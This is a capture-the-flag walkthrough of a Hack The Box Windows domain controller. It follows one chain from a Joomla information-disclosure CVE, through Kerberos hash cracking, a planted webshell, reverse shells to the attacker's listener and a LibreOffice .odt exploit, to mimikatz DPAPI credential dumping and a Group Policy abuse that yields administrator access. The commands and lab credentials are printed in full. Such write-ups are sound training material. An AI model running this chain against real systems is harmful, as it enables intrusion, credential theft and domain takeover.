HTB - Office

Machine Info

Office is a hard-difficulty Windows machine featuring various vulnerabilities including Joomla web application abuse, PCAP analysis to identify Kerberos credentials, abusing LibreOffice vulnerability, abusing MSKRP to dump DPAPI credentials and abusing Group Policies due to excessive Active Directory privileges.

Enumeration

Scope

IP Address: 10.10.11.3

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
80/tcp   open  http             syn-ack
139/tcp  open  netbios-ssn      syn-ack
443/tcp  open  https            syn-ack
445/tcp  open  microsoft-ds     syn-ack
593/tcp  open  http-rpc-epmap   syn-ack
3268/tcp open  globalcatLDAP    syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
5985/tcp open  wsman            syn-ack
9389/tcp open  adws             syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap  -sU -p1-10000 --min-rate 10000 $ip -Pn 

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p53,80,139,443,445,593,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
80/tcp   open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-title: Home
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/ 
| /cache/ /cli/ /components/ /includes/ /installation/ 
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-generator: Joomla! - Open Source Content Management
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-14T17:06:42+00:00; +8h00m10s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-14T17:06:43+00:00; +8h00m10s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Hosts: www.example.com, DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-07-14T17:06:04
|_  start_date: N/A
|_clock-skew: mean: 8h00m09s, deviation: 0s, median: 8h00m09s

* Open ports: 53,80,139,443,445,593,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - HTTPS - SMB - KERBEROS - LDAP - winRM
* Versions: Apache httpd 2.4.56 - OpenSSL/1.1.1t - PHP/8.0.28
* Important notes: 
	http-robots.txt: 16 disallowed entries (15 shown)
	http-generator:Joomla! - Open Source Content Management
	Domain: office. - DNS:DC.office.htb

HTTPS Enumeration

when visiting https://10.10.11.3/, it gives me Forbidden massages

SMB Enumeration

No thing from smb

KERBEROS Enumeration

Found some users from kerbrute with jsmith.txt wordlist

Additional users found when using xato-10-million wordlist

I added all users found in a wordlist and then tried ASREPROASTING attack but it failed

HTTP Enumeration

http://10.10.11.3/

The site is joomla CMS

I visited http://10.10.11.3/readme.txt to get the version and search for CVE for it

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ curl -s http://10.10.11.3/readme.txt | grep -i version

 * Joomla! 4.2 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_4.2_version_history
<snip>

I found this version is affected by unauthenticated information disclosure vulnerability

I started Metasploit, searched for exploit with CVE number and found one

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ msfconsole -q

msf6 > search CVE-2023-23752

Matching Modules
================
   #  Name                                                      Disclosure Date  Rank    Check  Description                                                
   -  ----                                                      ---------------  ----    -----  -----------                                                
   0  auxiliary/scanner/http/joomla_api_improper_access_checks  2023-02-01       normal  Yes    Joomla API Improper Access Checks                          

msf6 > use 0
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > options                                                                                  
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-me                         
                                         tasploit.html                                                                                                     
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the Joomla Application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host            

msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > set rhosts 10.10.11.3
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > run

[+] Users JSON saved to /home/kali/.msf4/loot/20240714053806_default_10.10.11.3_joomla.users_565355.bin
[+] Joomla Users
============

 ID   Super User  Name        Username       Email                   Send Email  Register Date      Last Visit Date    Group Names
 --   ----------  ----        --------       -----                   ----------  -------------      ---------------    -----------
 474  *           Tony Stark  Administrator  Administrator@holograp  1           2023-04-13 23:27:  2024-01-24 13:00:  Super Users
                                             hy.htb                              32                 47

[+] Config JSON saved to /home/kali/.msf4/loot/20240714053806_default_10.10.11.3_joomla.config_217752.bin
[+] Joomla Config
=============

 Setting        Value
 -------        -----
 db encryption  0
 db host        localhost
 db name        joomla_db
 db password    H0lOgrams4reTakIng0Ver754!
 db prefix      if2tx_
 db user        root
 dbtype         mysqli

[*] Scanned 1 of 1 hosts (100% complete)

We get database credentials:

 db host        localhost
 db name        joomla_db
 db password    H0lOgrams4reTakIng0Ver754!
 db user        root

Since I get username of joomla but still don't know the password, I will reuse the password of the database I found against the web login form and the users we found before

• Let's begin to enumerate the domain with these credentials and I will do the following

  • Run Bloodhound Ingestors

  • Enumerate the Shares

  • Searching for kerberoastable accounts

1. Run bloodhound.py to collect info and feed it into bloodhound GUI

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ bloodhound-python -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -ns $ip -d office.htb -c all

<snip>
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.office.htb
INFO: Done in 00M 21S

Start crackmapexec to view the shares and permissions on them

I run spider_plus module against the shares to explore their content fast

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ crackmapexec smb $ip -u dwolfe -p 'H0lOgrams4reTakIng0Ver754!' -M spider_plus
SMB         10.10.11.3      445    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.3      445    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 
SPIDER_P... 10.10.11.3      445    DC               [*] Started spidering plus with option:
SPIDER_P... 10.10.11.3      445    DC               [*]        DIR: ['print$']
SPIDER_P... 10.10.11.3      445    DC               [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.3      445    DC               [*]       SIZE: 51200
SPIDER_P... 10.10.11.3      445    DC               [*]     OUTPUT: /tmp/cme_spider_plus

I found .pcap file located at SOC Analysis share, So I will download and examine it locally

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ cat /tmp/cme_spider_plus/10.10.11.3.json

<snip>
    "SOC Analysis": {
        "Latest-System-Dump-8fbc124d.pcap": {
            "atime_epoch": "2023-05-07 20:59:54",
            "ctime_epoch": "2023-05-07 20:59:54",
            "mtime_epoch": "2023-05-10 14:51:42",
            "size": "1.31 MB"
        } 
<snip>

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ smbclient -U dwolfe \\\\$ip\\'SOC Analysis'         
Password for [WORKGROUP\dwolfe]:

smb: \> ls
  .                                   D        0  Wed May 10 14:52:24 2023
  ..                                DHS        0  Wed Feb 14 05:18:31 2024
  Latest-System-Dump-8fbc124d.pcap      A  1372860  Sun May  7 20:59:00 2023

smb: \> get Latest-System-Dump-8fbc124d.pcap 

Shell as web_account

Start Wireshark to examine the file

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ wireshark Latest-System-Dump-8fbc124d.pcap 

After examining wireshark, Only two packets took my attention:

The second packet has the cipher which is encrypted by the NTLM hash of the user requested kerberos and username: tstark, too.

Following up this post

Getting Passwords From Kerberos Pre-Authentication PacketsVbScrub

I can construct the kerberos hash to be able to crack it with hashcat

$<kerberos 5 pre-auth>$<encyption type>$<username>$<domain-name>$cipher

$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ hashcat -m 19900 kerberos.hash /usr/share/wordlists/rockyou.txt

<snip>
$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc:playboy69

Session..........: hashcat
Status...........: Cracked

I tried this password on joomla admin panel as administrator cause the CVE we found showed that the administrator account has Tony Stark name.

From HackTricks

After doing the steps above, I added a webshell and got RCE on the system

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ curl -s http://$ip/administrator/templates/atum/error.php?cmd=whoami
office\web_account

I will upgrade the webshell to p0wny.php to become more flexible

I didn't find useful things in the context of web_account as his home directory is empty, So I uploaded RunasCs.exe to get a shell with stark

Shell as tstark

.\RunasCs.exe tstark playboy69 PowerShell -r 10.10.16.7:4444

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-9b0db$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5748 created in background.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ rlwrap nc -lvnp 4444

listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.3] 61764

PS C:\Windows\system32> whoami
office\tstark

PS C:\Users\tstark> type Desktop\user.txt
fc7d5bd1f9cf6a3c6xxxxxxxxxxxxxxx

User Flag: fc7d5bd1f9cf6a3c6cxxxxxxxxxxxxxxx

Shell as ppotts

looking for listening ports, there is non-standard port listening

Looking for the process that run this port revealed that its web server running

PS C:\xampp\htdocs\internal> tasklist /svc | findstr 4024
httpd.exe                     4024 Apache2.4

I uploaded Chisel to the machine and map this port to my kali machine.

On kali run

./chisel_1.9.1_linux_amd64 server -p 8443 --reverse

On windows box run

.\c.exe client 10.10.16.7:8443 R:8083:localhost:8083

http://localhost:8083/resume.php

The web app doesn't any file extension except these four Doc, Docx, Docm, Odt.

after I uploaded a file.odt to the webapp, it appeared in applications folder under xampp\htdocs with different name

Note: No file with .odt was there before I upload my file!!!

PS C:\xampp\htdocs\internal> dir applications

    Directory: C:\xampp\htdocs\internal\applications

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/14/2024   4:13 PM          20321 john-it-30-000-0-5-years-john@htb-com.doc                            
-a----         7/14/2024   5:01 PM              0 john-it-30-000-0-5-years-john@htb-com.odt 

checking its permissions, the user ppotts has full access on it.

PS C:\xampp\htdocs\internal> icacls applications
icacls applications
applications CREATOR OWNER:(OI)(CI)(IO)(F)
             OFFICE\PPotts:(OI)(CI)(NP)(F)
             NT AUTHORITY\SYSTEM:(OI)(CI)(F)
             NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(F)
             OFFICE\web_account:(OI)(CI)(RX,W)
             BUILTIN\Administrators:(OI)(CI)(F)
             BUILTIN\Users:(OI)(CI)(RX)

The community said that there is a CVE affected Libreoffice to create .odt file and get RCE from it

GitHub - elweth-sec/CVE-2023-2255: CVE-2023-2255 Libre OfficeGitHub

┌──(kali㉿kali)-[~/…/HTB/machines/Office/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'C:\Users\Public\nc.exe 10.10.16.7 8888 -e PowerShell' --output 'exploit.odt'
File exploit.odt has been created !

Upload the exploit via webapp

Get a shell as ppotts

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ rlwrap nc -lvnp 8888

listening on [any] 8888 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.3] 62159
Windows PowerShell

PS C:\Program Files\LibreOffice 5\program> whoami
office\ppotts

There is a job_offering.ps1 on music directory that is responsible to trigger the exploit

PS C:\Users\PPotts> type Music\job_offering.ps1

# Specify the path to the directory containing ODT files
$directoryPath = "C:\xampp\htdocs\internal\applications"

# Get all ODT files in the directory
$odtFiles = Get-ChildItem -Path $directoryPath -Filter *.odt

foreach ($odtFile in $odtFiles) {
    $newFileName = $odtFile.BaseName + "_resume" + $odtFile.Extension
    $destination = Join-Path -Path "c:\xampp\htdocs\internal\applications\" -ChildPath $newFileName
    Copy-Item -Path $odtFile.FullName -Destination $destination -Force
    del C:\xampp\htdocs\internal\applications\$odtFile
}


$odtFiles = Get-ChildItem -Path $directoryPath -Filter *.odt

# Array to store LibreOffice process IDs
$libreOfficeProcessIds = @()

foreach ($odtFile in $odtFiles) {
    # Start LibreOffice to open the ODT file
    Start-Process "C:\Program Files\LibreOffice 5\program\soffice.exe" -ArgumentList "--headless", "--invisible", "--nologo", "--norestore", "--accept=uno:socket,host=localhost,port=8100;urp;StarOffice.ServiceManager", $odtFile.FullName -PassThru | ForEach-Object {
        # Store the process ID for later termination
        $libreOfficeProcessIds = $_.Id

    }

    # Add a delay (adjust as needed) to ensure LibreOffice has enough time to open the file
    Start-Sleep -Seconds 7

    # Wait for LibreOffice processes to finish opening files and then terminate them
    Stop-Process -Id $libreOfficeProcessIds -Force

    # Add a delay (adjust as needed) to ensure LibreOffice has enough time to open the file
    Start-Sleep -Seconds 5

}

Get-ChildItem -Path "c:\xampp\htdocs\internal\applications\" -Force | Remove-Item -Force

# Put the MacroSecurityLevel key back to its original value
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel" /v "Value" /t REG_DWORD /d 3 /f

Shell as hhogan

There are stored credentials for hhogan in user ppotts session

PS C:\Users\PPotts> cmdkey /list

Currently stored credentials:

    Target: LegacyGeneric:target=MyTarget
    Type: Generic 
    User: MyUser
    
    Target: Domain:interactive=office\hhogan
    Type: Domain Password
    User: office\hhogan

When I tried to execute commands as that user, It asked for a password

PS C:\Users\PPotts> runas /savecred /user:office\hhogan whoami
Enter the password for office\hhogan: 

Looking at bloodhound, User hhogan is a member of GPO MANAGERS which has the ability to add group policy object that can be abused to do malicious actions.

As we don't know the password of hhogan, We can extract it by decrypting DPAPI. We need the masterkey and credentials files which are located by default in <user>\AppData\Roaming\Microsoft\Credentials & <user>\AppData\Roaming\Microsoft\Protect\<user-sid>\GUID

Credentials files

PS C:\Users\PPotts> ls -Force AppData\Roaming\Microsoft\Credentials

    Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          5/9/2023   2:08 PM            358 18A1927A997A794B65E9849883AC3F3E
-a-hs-          5/9/2023   4:03 PM            398 84F1CAEEBF466550F4967858F9353FB4
-a-hs-         7/14/2024   5:18 PM            374 E76CCA3670CD9BB98DF79E0A8D176F1E

Master keys

PS C:\Users\PPotts> ls -Force AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\

    Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107

Mode            LastWriteTime         Length Name
----            -------------         ------ ----

-a-hs-         1/17/2024   3:43 PM   740 10811601-0fa9-43c2-97e5-9bef8471fc7d
-a-hs-          5/2/2023   4:13 PM   740 191d3f9d-7959-4b4d-a520-a444853c47eb
-a-hs-         7/14/2024  10:00 AM   740 5f692621-38e9-43bb-ad87-e3ff40ab2720 

I uploaded mimkatz.exe and began to extract them.

We must provide a password for the command below but the is a post from SpectorOps that says " it can be done without a password, just provide /rpc options to mimikatz"

https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107

.\mimikatz.exe "dpapi::masterkey /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb  /sid:S-1-5-21-1199398058-4196589450-691661856-1107 /rpc" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # dpapi::masterkey /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb  /sid:S-1-5-21-1199398058-4196589450-691661856-1107 /rpc
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {191d3f9d-7959-4b4d-a520-a444853c47eb}
  dwFlags            : 00000000 - 0
  dwMasterKeyLen     : 00000088 - 136
  dwBackupKeyLen     : 00000068 - 104
  dwCredHistLen      : 00000000 - 0
  dwDomainKeyLen     : 00000174 - 372
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : c521daa0857ee4fa6e4246266081e94c
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : 1107e1ab3e107528a73a2dafc0a2db28de1ea0a07e92cff03a935635013435d75e41797f612903d6eea41a8fc4f7ebe8d2fbecb0c74cdebb1e7df3c692682a066faa3edf107792d116584625cc97f0094384a5be811e9d5ce84e5f032704330609171c973008d84f

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : a2741b13d7261697be4241ebbe05098a
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : 21bf24763fbb1400010c08fccc5423fe7da8190c61d3006f2d5efd5ea586f463116805692bae637b2ab548828b3afb9313edc715edd11dc21143f4ce91f4f67afe987005320d3209

[domainkey]
  **DOMAINKEY**
    dwVersion        : 00000002 - 2
    dwSecretLen      : 00000100 - 256
    dwAccesscheckLen : 00000058 - 88
    guidMasterKey    : {e523832a-e126-4d6e-ac04-ed10da72b32f}
    pbSecret         : 159613bdc2d90dd4834a37e29873ce04c74722a706d0ba4770865039b3520ff46cf9c9281542665df2e72db48f67e16e2014e07b88f8b2f7d376a8b9d47041768d650c20661aee31dc340aead98b7600662d2dc320b4f89cf7384c2a47809c024adf0694048c38d6e1e3e10e8bd7baa7a6f1214cd3a029f8372225b2df9754c19e2ae4bc5ff4b85755b4c2dfc89add9f73c54ac45a221e5a72d3efe491aa6da8fb0104a983be20af3280ae68783e8648df413d082fa7d25506e9e6de1aadbf9cf93ec8dfc5fab4bfe1dd1492dbb679b1fa25c3f15fb8500c6021f518c74e42cd4b5d5d6e1057f912db5479ebda56892f346b4e9bf6404906c7cd65a54eea2842
    pbAccesscheck    : 1430b9a3c4ab2e9d5f61dd6c62aab8e1742338623f08461fe991cccd5b3e4621d4c8e322650460181967c409c20efcf02e8936c007f7a506566d66ba57448aa8c3524f0b9cf881afcbb80c9d8c341026f3d45382f63f8665



[backupkey] without DPAPI_SYSTEM: 
  key : 4d1b2c18baba7442e79d33cc771bf54027ae2500e08da3ecfccf91303bd471b6
  sha1: eeb787c4259e3c8b8408201ee5e54fc29fad22b2

[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
  key : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
  sha1: 85285eb368befb1670633b05ce58ca4d75c73c77

Try all the three credential files until you get the password

.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4  /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4  /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {191d3f9d-7959-4b4d-a520-a444853c47eb}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006603 - 26115 (CALG_3DES)
  dwAlgCryptLen      : 000000c0 - 192
  dwSaltLen          : 00000010 - 16
  pbSalt             : 649c4466d5d647dd2c595f4e43fb7e1d
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         : 
  algHash            : 00008004 - 32772 (CALG_SHA1)
  dwAlgHashLen       : 000000a0 - 160
  dwHmac2KeyLen      : 00000010 - 16
  pbHmack2Key        : 32e88dfd1927fdef0ede5abf2c024e3a
  dwDataLen          : 000000c0 - 192
  pbData             : f73b168ecbad599e5ca202cf9ff719ace31cc92423a28aff5838d7063de5cccd4ca86bfb2950391284b26a34b0eff2dbc9799bdd726df9fad9cb284bacd7f1ccbba0fe140ac16264896a810e80cac3b68f82c80347c4deaf682c2f4d3be1de025f0a68988fa9d633de943f7b809f35a141149ac748bb415990fb6ea95ef49bd561eb39358d1092aef3bbcc7d5f5f20bab8d3e395350c711d39dbe7c29d49a5328975aa6fd5267b39cf22ed1f9b933e2b8145d66a5a370dcf76de2acdf549fc97
  dwSignLen          : 00000014 - 20
  pbSign             : 21bfb22ca38e0a802e38065458cecef00b450976

Decrypting Credential:
 * masterkey     : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000be - 190
  credUnk0       : 00000000 - 0

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 5/9/2023 11:03:21 PM
  unkFlagsOrSize : 00000018 - 24
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:interactive=OFFICE\HHogan
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : OFFICE\HHogan
  CredentialBlob : H4ppyxxxxxx
  Attributes     : 0

Checking the validity of the credentials and the ability to remote access the machine

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ crackmapexec smb $ip -u HHogan -p 'H4ppyxxxxxx'                 

SMB      10.10.11.3      445    DC    [+] office.htb\HHogan:H4ppyxxxxxx 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ crackmapexec winrm $ip -u HHogan -p 'H4ppyxxxxxx'

WINRM    10.10.11.3      5985   DC    [+] office.htb\HHogan:H4ppyFtW183# (Pwn3d!)

Access the machine as hhogan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ evil-winrm -i $ip -u HHogan -p 'H4ppyxxxxxxx'

*Evil-WinRM* PS C:\Users\HHogan\Documents>

I don't know any tools to abuse GPO as I didn't perform this attack before so I searched online for one and find SharpDPOAbuse

GitHub - byronkg/SharpGPOAbuse: Precompiled executableGitHub

*Evil-WinRM* PS C:\Users\HHogan\Documents> upload SharpGPOAbuse.exe

Info: Upload successful!

The github repo also shows how to use it

I will use --AddLocalAdmin and here are its options

Options required to add a new local admin:
--UserAccount
        Set the name of the account to be added in local admins.
--GPOName
        The name of the vulnerable GPO.

Example:
        SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"

*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-GPO -All | Select-Object DisplayName

DisplayName
-----------
Windows Firewall GPO
Default Domain Policy
Default Active Directory Settings GPO
Default Domain Controllers Policy
Windows Update GPO
Windows Update Domain Policy
Software Installation GPO
Password Policy GPO


*Evil-WinRM* PS C:\Users\HHogan\Documents> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount hhogan --GPOName "Default Domain Policy
"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of hhogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

Update the group policy to take effect

*Evil-WinRM* PS C:\Users\HHogan\Documents> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

*Evil-WinRM* PS C:\Users\HHogan\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         7/14/2024   9:59 AM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
abd037fa1e9078e44dxxxxxxxxxxxxxxxxx

Root Flag: abd037fa1e9078e44dxxxxxxxxxxxxxxxxx